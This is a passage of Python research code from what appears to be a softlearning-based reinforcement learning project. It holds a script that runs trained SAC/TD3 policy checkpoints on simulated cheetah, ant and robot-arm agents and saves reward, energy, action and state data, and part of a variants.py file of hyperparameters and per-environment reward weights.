parser = argparse.ArgumentParser()
parser.add_argument('--agent',
type=str)
parser.add_argument('--path',
type=str, default=None)
parser.add_argument('--base_path',
type=str, default=None)
parser.add_argument('--tr',
default='all',
type=str,
nargs='+')
parser.add_argument('--energy',
type=str, default='Energy0-v0',
choices=['Energy0-v0','EnergyOne-v0','Energyz-v0',
'EnergyPoint5-v0','EnergyPoint1-v0',
'EnergyPoint25-v0','EnergyAlt-v0','smallRange-v0',
'bigRange-v0','Symloss-v0','Symdup-v0','SymlossGfblr-v0',
'SymdupGfblr-v0','SymlossG-v0','SymdupG-v0',
'SymlossT-v0','SymdupT-v0',
'Energy0-v1','Energy0-v2','Energy0-v3','Energy0-v4','Energy0-v5','Energy0-v6','Energy0-v7','Energy0-v8',
'Energy0-v9',
'SymlossT-v1','SymlossT-v2','SymlossT-v3','SymlossT-v4','SymlossT-v5','SymlossT-v6',
'SymlossG-v1','SymlossG-v2','SymlossG-v3','SymlossG-v4','SymlossG-v5','SymlossG-v6',
'LessSpring-v0','LessSpring-v2','LessSpring-v4','LessSpring-v6',
'MoreSpring-v0','MoreSpring-v2','MoreSpring-v4','MoreSpring-v6',
'ExSpring-v0', 'ExSpring-v2', 'ExSpring-v4','ExSpring-v6',
'MinSpring-v0', 'MinSpring-v2', 'MinSpring-v4', 'MinSpring-v6',
'ExSpring-v00', 'ExSpring-v45','ExSpring-v65',
'MinSpring-v00', 'MinSpring-v45', 'MinSpring-v65',
'Energy0-v00','Energy0-v45','Energy0-v65',
'MinSpringG-v0','MinSpringG-v2', 'MinSpringG-v4', 'MinSpringG-v6',
'MinSpringT-v0', 'MinSpringT-v2', 'MinSpringT-v4','MinSpringT-v6',
'ExSpringT-v0', 'ExSpringT-v2', 'ExSpringT-v4', 'ExSpringT-v6',
'ExSpringG-v0', 'ExSpringG-v2', 'ExSpringG-v4', 'ExSpringG-v6',
])
parser.add_argument('--start', '-s', type=int,default=100)
parser.add_argument('--final', '-f', type=int,default=3000)
parser.add_argument('--step', '-st', type=int,default=100)
parser.add_argument('--gpu_choice', type=int, default=0)
parser.add_argument('--max-path-length', '-l', type=int, default=1000)
parser.add_argument('--num-rollouts', '-n', type=int, default=10)
parser.add_argument('--render-mode', '-r',
type=str,
default=None,
choices=('human', 'rgb_array', None),
help="Mode to render the rollouts in.")
parser.add_argument('--deterministic', '-d',
type=lambda x: bool(strtobool(x)),
nargs='?',
const=True,
default=True,
help="Evaluate policy deterministically.")
parser.add_argument('--name',
type=str,
help='Experiment name')
args = parser.parse_args()
return args
def simulate_policy(args):
if args.gpu_choice is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu_choice)
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
checkpoint_path = args.checkpoint_path.rstrip('/')
experiment_path = os.path.dirname(checkpoint_path)
variant_path = os.path.join(experiment_path, 'params.json')
with open(variant_path, 'r') as f:
variant = json.load(f)
pickle_path = os.path.join(checkpoint_path, 'checkpoint.pkl')
print(pickle_path)
print(os.getcwd())
with open(pickle_path, 'rb') as f:
picklable = pickle.load(f)
env = picklable['env']
policy = (
get_policy_from_variant(variant, env))
policy.set_weights(picklable['policy_weights'])
with policy.set_deterministic (args.deterministic):
paths = my_rollouts(env=env,
policy=policy,
path_length=args.max_path_length,
n_paths=args.num_rollouts,
render_mode=args.render_mode)
return paths
if __name__ == '__main__':
args = parse_args()
if not args.path:
agent=args.agent
energy=args.energy
if args.base_path:
top_path=os.path.join(args.base_path,agent+'/'+energy)
else:
top_path='./experiments_results/gym/'+agent+'/'+energy
print(top_path)
if 'Energy0' in energy:
ene_sub='_E0_TD3'
elif 'EnergyOne' in energy:
ene_sub = '_E1_TD3'
elif 'EnergyPoint5' in energy:
ene_sub = '_Ep5_TD3'
elif 'Energyz' in energy:
ene_sub = '_Ez_TD3'
elif 'EnergyPoint1' in energy:
ene_sub = '_Ep1_TD3'
elif 'EnergyPoint25' in energy:
ene_sub = '_Ep25_TD3'
elif 'EnergyAlt' in energy:
ene_sub = '_Ealt_TD3'
elif 'smallRange' in energy:
ene_sub = '_sR_TD3'
elif 'bigRange' in energy:
ene_sub = '_bR_TD3'
elif 'LessSpring' in energy:
ene_sub = '_lS_TD3'
elif 'MoreSpring' in energy:
ene_sub = '_mS_TD3'
elif 'ExSpring' in energy:
if "T" in energy:
ene_sub = '_maxST_TD3'
elif "G" in energy:
ene_sub = '_maxSG_TD3'
else:
ene_sub = '_maxS_TD3'
elif 'MinSpring' in energy:
if "T" in energy:
ene_sub = '_minST_TD3'
elif "G" in energy:
ene_sub = '_minSG_TD3'
else:
ene_sub = '_minS_TD3'
version = energy.split("-")[1]
if version != "v0":
ene_sub = ene_sub + version
if agent=='HalfCheetah':
abrv='HC'
elif 'HalfCheetahSquat' in agent and 'dof' in agent:
abrv='HCsquat'
tmp_agent_name=agent.replace('HalfCheetahSquat', '')
abrv+=tmp_agent_name
elif 'HalfCheetah' in agent and 'dof' in agent:
abrv = 'HC'
tmp_agent_name = agent.replace('HalfCheetah', '')
abrv += tmp_agent_name
elif agent=='HalfCheetahHeavy':
abrv = 'HCheavy'
elif agent=='FullCheetah':
abrv = 'FC'
elif agent == 'FullCheetahHeavy':
abrv = 'FCheavy'
else:
abrv = agent
for experiment in os.listdir(top_path):
exp_path=os.path.join(top_path,experiment)
if 'TD3' in experiment:
base_name=abrv+ene_sub
trial='_'+experiment.split('_')[-1]
extract_b = True
if 'all' not in args.tr and trial not in args.tr:
extract_b = False
if extract_b:
for folder in os.listdir(exp_path):
if 'ExperimentRunner' in folder:
base_path=os.path.join(exp_path,folder)
start=args.start
step=args.step
final=args.final
all_checkpoint = []
all_name =[]
for ch in range(start,final+1,step):
specific='checkpoint_'+str(ch)
all_checkpoint.append(os.path.join(base_path, specific))
namee = base_name + '_C' + str(ch) + trial
all_name.append(namee)
for ind,chk in enumerate(all_checkpoint):
args.checkpoint_path=chk
args.name=all_name[ind]
paths=simulate_policy(args)
total_ori_reward = []
total_energy = []
total_pure_reward = []
action_list=[]
states_list = []
for path in paths:
try:
tmp = 0
tmpe=0
tmpPure=0
for i in range(len(path['infos'])):
tmp = tmp + path['infos'][i]['ori_reward']
tmpe = tmpe + path['infos'][i]['energy']
if "HalfCheetah" in agent or "FullCheetah" in agent :
if "Squat" in agent:
tmpPure=tmpPure + path['infos'][i]['reward_dist']
else:
tmpPure=tmpPure + path['infos'][i]['reward_run']
elif "Ant" in agent:
if "SquaT" in agent:
tmpPure = tmpPure + path['infos'][i]['reward_distance']
elif "Run" in agent:
tmpPure = tmpPure + path['infos'][i]['reward_forward']
elif "VA" in agent:
tmpPure = tmpPure + path['infos'][i]['reward_dist']/5
elif "RealArm" in agent:
tmpPure = tmpPure + path['infos'][i]['reward_dist']/5
if agent=="FullCheetahHeavy" and "v0" not in energy:
speed=speed_dict[version]
print("Speed: ",speed)
tmp=tmp+len(path['infos'])*speed
tmpPure=tmpPure+len(path['infos'])*speed
total_ori_reward.append(tmp)
total_energy.append(tmpe)
total_pure_reward.append(tmpPure)
except:
pass
path_action=path['actions']
if agent == 'FullCheetahHeavy' :
if 'T' in ene_sub:
print("trot")
path_action=np.asarray(path_action)
path_action[:,6:9] = -1 * path_action[:,0:3]
path_action[:,9:12] = -1 * path_action[:,3:6]
elif 'G' in ene_sub :
print("gallop")
path_action=np.asarray(path_action)
path_action[:,6:12] = path_action[:,0:6]
action_list.append(path_action)
states_list.append(path['states'])
action_list=np.asarray(action_list)
states_list = np.asarray(states_list)
name = args.name
print(name)
total_energy = np.asarray(total_energy)
if not os.path.exists('./experiments_results/collected_actions/trajectory_npy/reward_energy_dict'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/reward_energy_dict',exist_ok=True)
if not os.path.exists('./experiments_results/collected_actions/trajectory_npy/actions_npy'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/actions_npy',exist_ok=True)
if not os.path.exists('./experiments_results/collected_actions/trajectory_npy/states_npy'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/states_npy',exist_ok=True)
if not os.path.exists(
'./experiments_results/collected_actions/trajectory_npy/pure_reward_dict'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/pure_reward_dict',
exist_ok=True)
try:
diagnostics = OrderedDict((
('ori-return-average', np.mean(total_ori_reward)),
('ori-return-min', np.min(total_ori_reward)),
('ori-return-max', np.max(total_ori_reward)),
('ori-return-std', np.std(total_ori_reward)),
('total-energy-average', np.mean(total_energy)),
('total-energy-min', np.min(total_energy)),
('total-energy-max', np.max(total_energy)),
('total-energy-std', np.std(total_energy)),
))
np.save('./experiments_results/collected_actions/trajectory_npy/reward_energy_dict/' + name, diagnostics)
except:
print("error in reward energy dict saving")
pass
try:
diagnostics = OrderedDict((
('pure-return-average', np.mean(total_pure_reward)),
('pure-return-std', np.std(total_pure_reward)),
))
np.save('./experiments_results/collected_actions/trajectory_npy/pure_reward_dict/' + name, diagnostics)
except:
pass
np.save('./experiments_results/collected_actions/trajectory_npy/actions_npy/' + name, action_list)
np.save('./experiments_results/collected_actions/trajectory_npy/states_npy/' + name, states_list)
else:
base_path = args.path
#base_name = abrv + ene_sub
trial = '_' + base_path.split('/')[-2].split('-')[-1].split('_')[-1]
base_name = base_path.split('/')[-2].split('-')[-1].replace(trial,'')
start = args.start
step = args.step
final = args.final
all_checkpoint = []
all_name = []
for ch in range(start, final + 1, step):
specific = 'checkpoint_' + str(ch)
all_checkpoint.append(os.path.join(base_path, specific))
namee = base_name + '_C' + str(ch) + trial
all_name.append(namee)
for ind, chk in enumerate(all_checkpoint):
args.checkpoint_path = chk
args.name = all_name[ind]
paths = simulate_policy(args)
total_ori_reward = []
total_energy = []
action_list = []
states_list = []
for path in paths:
try:
tmp = 0
tmpe = 0
for i in range(len(path['infos'])):
tmp = tmp + path['infos'][i]['ori_reward']
tmpe = tmpe + path['infos'][i]['energy']
total_ori_reward.append(tmp)
total_energy.append(tmpe)
except:
pass
action_list.append(path['actions'])
states_list.append(path['states'])
action_list = np.asarray(action_list)
states_list = np.asarray(states_list)
name = args.name
print(name)
total_energy = np.asarray(total_energy)
if not os.path.exists('./experiments_results/collected_actions/trajectory_npy/reward_energy_dict'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/reward_energy_dict', exist_ok=True)
if not os.path.exists('./experiments_results/collected_actions/trajectory_npy/actions_npy'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/actions_npy', exist_ok=True)
if not os.path.exists('./experiments_results/collected_actions/trajectory_npy/states_npy'):
os.makedirs('./experiments_results/collected_actions/trajectory_npy/states_npy', exist_ok=True)
try:
diagnostics = OrderedDict((
('ori-return-average', np.mean(total_ori_reward)),
('ori-return-min', np.min(total_ori_reward)),
('ori-return-max', np.max(total_ori_reward)),
('ori-return-std', np.std(total_ori_reward)),
('total-energy-average', np.mean(total_energy)),
('total-energy-min', np.min(total_energy)),
('total-energy-max', np.max(total_energy)),
('total-energy-std', np.std(total_energy)),
))
np.save('./experiments_results/collected_actions/trajectory_npy/reward_energy_dict/' + name,
diagnostics)
except:
pass
np.save('./experiments_results/collected_actions/trajectory_npy/actions_npy/' + name, action_list)
np.save('./experiments_results/collected_actions/trajectory_npy/states_npy/' + name, states_list)
```
#### File: examples/development/variants.py
```python
from ray import tune
import numpy as np
from softlearning.misc.utils import deep_update
M = 256
N = 128#256
#N=45#human
REPARAMETERIZE = True
NUM_COUPLING_LAYERS = 2
GAUSSIAN_POLICY_PARAMS_BASE = {
'type': 'GaussianPolicy',
'kwargs': {
'hidden_layer_sizes': (M, M),
'squash': True,
}
}
DETERMINISTICS_POLICY_PARAMS_BASE = {
'type': 'DeterministicsPolicy',
'kwargs': {
'hidden_layer_sizes': (M, M),
'squash': True
}
}
GAUSSIAN_POLICY_PARAMS_FOR_DOMAIN = {}
DETERMINISTICS_POLICY_PARAMS_FOR_DOMAIN = {}
POLICY_PARAMS_BASE = {
'GaussianPolicy': GAUSSIAN_POLICY_PARAMS_BASE,
'DeterministicsPolicy': DETERMINISTICS_POLICY_PARAMS_BASE,
}
POLICY_PARAMS_BASE.update({
'gaussian': POLICY_PARAMS_BASE['GaussianPolicy'],
'deterministicsPolicy': POLICY_PARAMS_BASE['DeterministicsPolicy'],
})
POLICY_PARAMS_FOR_DOMAIN = {
'GaussianPolicy': GAUSSIAN_POLICY_PARAMS_FOR_DOMAIN,
'DeterministicsPolicy': DETERMINISTICS_POLICY_PARAMS_FOR_DOMAIN,
}
POLICY_PARAMS_FOR_DOMAIN.update({
'gaussian': POLICY_PARAMS_FOR_DOMAIN['GaussianPolicy'],
'deterministicsPolicy': POLICY_PARAMS_FOR_DOMAIN['DeterministicsPolicy'],
})
DEFAULT_MAX_PATH_LENGTH = 1000
MAX_PATH_LENGTH_PER_DOMAIN = {
'Point2DEnv': 50,
'Pendulum': 200,
}
ALGORITHM_PARAMS_BASE = {
'type': 'SAC',
'kwargs': {
'epoch_length': 1000,
'train_every_n_steps': 1,
'n_train_repeat': 1,
'eval_render_mode': None,
'eval_n_episodes': 3,
'eval_deterministic': True,
'discount': 0.99,
'tau': 5e-3,
'reward_scale': 1.0,
}
}
ALGORITHM_PARAMS_ADDITIONAL = {
'SAC': {
'type': 'SAC',
'kwargs': {
'reparameterize': REPARAMETERIZE,
'lr': 3e-4,
'target_update_interval': 1,
'tau': 5e-3,
'target_entropy': 'auto',
'store_extra_policy_info': False,
'action_prior': 'uniform',
'n_initial_exploration_steps': int(1e3),
}
},
'TD3': {
'type': 'TD3',
'kwargs': {
'reparameterize': REPARAMETERIZE,
'lr': 1e-3,
'target_update_interval': 2,
'tau': 5e-3,
'store_extra_policy_info': False,
'action_prior': 'uniform',
'n_initial_exploration_steps': int(1e4),
}
},
}
DEFAULT_NUM_EPOCHS = 200
NUM_EPOCHS_PER_DOMAIN = {
'Swimmer': int(3e2),
'Hopper': int(1e3),
'HalfCheetah': int(3e3),
'Giraffe': int(2e3),
'HalfCheetahHeavy':int(3e3),
'HalfCheetah5dof': int(3e3),
'HalfCheetah5dofv2': int(3e3),
'HalfCheetah5dofv3': int(3e3),
'HalfCheetah5dofv4': int(3e3),
'HalfCheetah5dofv5': int(3e3),
'HalfCheetah5dofv6': int(3e3),
'HalfCheetah4dof':int(3e3),
'HalfCheetah4dofv2': int(3e3),
'HalfCheetah4dofv3': int(3e3),
'HalfCheetah4dofv4': int(3e3),
'HalfCheetah4dofv5': int(3e3),
'HalfCheetah4dofv6': int(3e3),
'HalfCheetah2dof':int(3e3),
'HalfCheetah2dofv2': int(3e3),
'HalfCheetah2dofv3': int(3e3),
'HalfCheetah2dofv4': int(3e3),
'HalfCheetah2dofv5': int(3e3),
'HalfCheetah3doff': int(3e3),
'HalfCheetah3dofb': int(3e3),
'HalfCheetah3dofv3': int(3e3),
'HalfCheetah3dofv4': int(3e3),
'HalfCheetahSquat2dof': int(60),
'HalfCheetahSquat4dof': int(90),
'HalfCheetahSquat6dof': int(120),
'FullCheetah':int(3e3),
'FullCheetahHeavy': int(3e3),
'Centripede':int(2e3),
'Walker2d': int(1e3),
'Bipedal2d':int(300),
'Ant': int(2e3),
'AntSquaTRedundant': int(500),
'AntSquaT': int(500),
'AntRun': int(300),
'VA': int(30),
'VA4dof': int(30),
'VA6dof': int(30),
'VA8dof': int(100),
'RealArm7dof':int(90),
'RealArm6dof': int(90),
'RealArm5dof': int(60),
'RealArm4dof': int(60),
'RealArm5dofLT': int(60),
'RealArm4dofLT': int(60),
'RealArm5dofMinE': int(60),
'RealArm4dofMinE': int(60),
'RealArm3dof': int(30),
'AntHeavy': int(2e3),
'Humanoid': int(5e3),#int(1e4),
'Humanoidrllab': int(3e3),#int(1e4),
'Pusher2d': int(2e3),
'HandManipulatePen': int(1e4),
'HandManipulateEgg': int(1e4),
'HandManipulateBlock': int(1e4),
'HandReach': int(1e4),
'Point2DEnv': int(200),
'Reacher': int(200),
'Pendulum': 10,
'VMP': 50,
}
ALGORITHM_PARAMS_PER_DOMAIN = {
**{
domain: {
'kwargs': {
'n_epochs': NUM_EPOCHS_PER_DOMAIN.get(
domain, DEFAULT_NUM_EPOCHS),
'n_initial_exploration_steps': (
MAX_PATH_LENGTH_PER_DOMAIN.get(
domain, DEFAULT_MAX_PATH_LENGTH
) * 10),
}
} for domain in NUM_EPOCHS_PER_DOMAIN
}
}
ENV_PARAMS = {
'Bipedal2d': { # 6 DoF
'Energy0-v0': {
'target_energy':3
},
},
'VA': { # 6 DoF
'Energyz-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.0,
},
'Energy0-v0': {
'distance_reward_weight':5.0,
'ctrl_cost_weight':0.05,
},
'EnergyPoint5-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.5,
},
'EnergyOne-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight':1,
},
'smallRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file':'vertical_arm_smallRange.xml'
},
'bigRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file':'vertical_arm_bigRange.xml'
},
},
'VA4dof': { # 6 DoF
'Energyz-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.0,
},
'Energy0-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
},
'EnergyPoint5-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.5,
},
'EnergyOne-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 1,
},
'smallRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file': 'vertical_arm4dof_smallRange.xml'
},
'bigRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file': 'vertical_arm4dof_bigRange.xml'
},
},
'VA6dof': { # 6 DoF
'Energyz-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.0,
},
'Energy0-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
},
'EnergyPoint5-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.5,
},
'EnergyOne-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 1,
},
'smallRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file': 'vertical_arm6dof_smallRange.xml'
},
'bigRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file': 'vertical_arm6dof_bigRange.xml'
},
},
'VA8dof': { # 6 DoF
'Energyz-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.0,
},
'Energy0-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,#0.05
},
'EnergyPoint5-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.5,
},
'EnergyOne-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 1,
},
'smallRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file': 'vertical_arm8dof_smallRange.xml'
},
'bigRange-v0': {
'distance_reward_weight': 5.0,
'ctrl_cost_weight': 0.05,
'xml_file': 'vertical_arm8dof_bigRange.xml'
},
},
'RealArm7dof': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight':5,
'shoulder_cost_weight':1,
'wrist_cost_weight':0
},
'Energy0-v1': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx':0.01
},
'Energy0-v2': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.1
},
'Energy0-v3': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.2
},
'Energy0-v9': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.15
},
'Energy0-v4': {
'xml_file': 'real_arm7dofLessTorque.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v5': {
'xml_file': 'real_arm7dofMinTorque.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v6': {
'xml_file': 'real_arm7dofMoreWeight.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v7': {
'xml_file': 'real_arm7dof1p5Weight.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v8': {
'xml_file': 'real_arm7dof2p5Weight.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
},
'RealArm6dof': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v1': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.01
},
'Energy0-v2': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.1
},
},
'RealArm5dof': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v1': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.01
},
'Energy0-v2': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.1
},
},
'RealArm5dofMinE': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'MinE_cost_weight': 0.5,
},
},
'RealArm4dofMinE': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'MinE_cost_weight': 0.5,
},
},
'RealArm5dofLT': { # 6 DoF
'Energy0-v0': {
'xml_file': 'real_arm5dofLessTorque.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
},
'RealArm4dofLT': { # 6 DoF
'Energy0-v0': {
'xml_file': 'real_arm4dofLessTorque.xml',
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
},
'RealArm4dof': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v1': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.01
},
'Energy0-v2': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.1
},
},
'RealArm3dof': { # 6 DoF
'Energy0-v0': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0
},
'Energy0-v1': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.01
},
'Energy0-v2': {
'distance_reward_weight': 5,
'shoulder_cost_weight': 1,
'wrist_cost_weight': 0,
'pcx': 0.1
},
},
'Walker2d': { # 6 DoF
'Symloss-v0': {
},
'Symdup-v0': {
},
},
'HalfCheetahHeavy': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':0,
},
},
'HalfCheetah5dof': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah5dofv2': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
},
'HalfCheetah5dofv3': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
},
'HalfCheetah5dofv4': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
},
'HalfCheetah5dofv5': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
},
'HalfCheetah5dofv6': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
},
'HalfCheetah4dof': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah4dofv2': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah4dofv3': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah4dofv4': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah4dofv5': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah4dofv6': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah3doff': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah3dofb': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah3dofv3': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetah3dofv4': { # 6 DoF
'Energy0-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
},
'Energyz-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0,
'energy_weights': 0,
},
'EnergyOne-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 1.,
},
},
'HalfCheetahSquat2dof': { # 6 DoF
'Energyz-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'Energy0-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.1,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyPoint25-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.25,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyAlt-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.,
'horizontal_weight': 0.1,
'energy_weights': 1.5,
},
},
'HalfCheetahSquat4dof': { # 6 DoF
'Energyz-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'Energy0-v0': {
'distance_weigth': 5.0,
'ctrl_cost_weight': 0.25,
'horizontal_weight': 0.1,
'energy_weights': 0,
},
'EnergyPoint1-v0': {
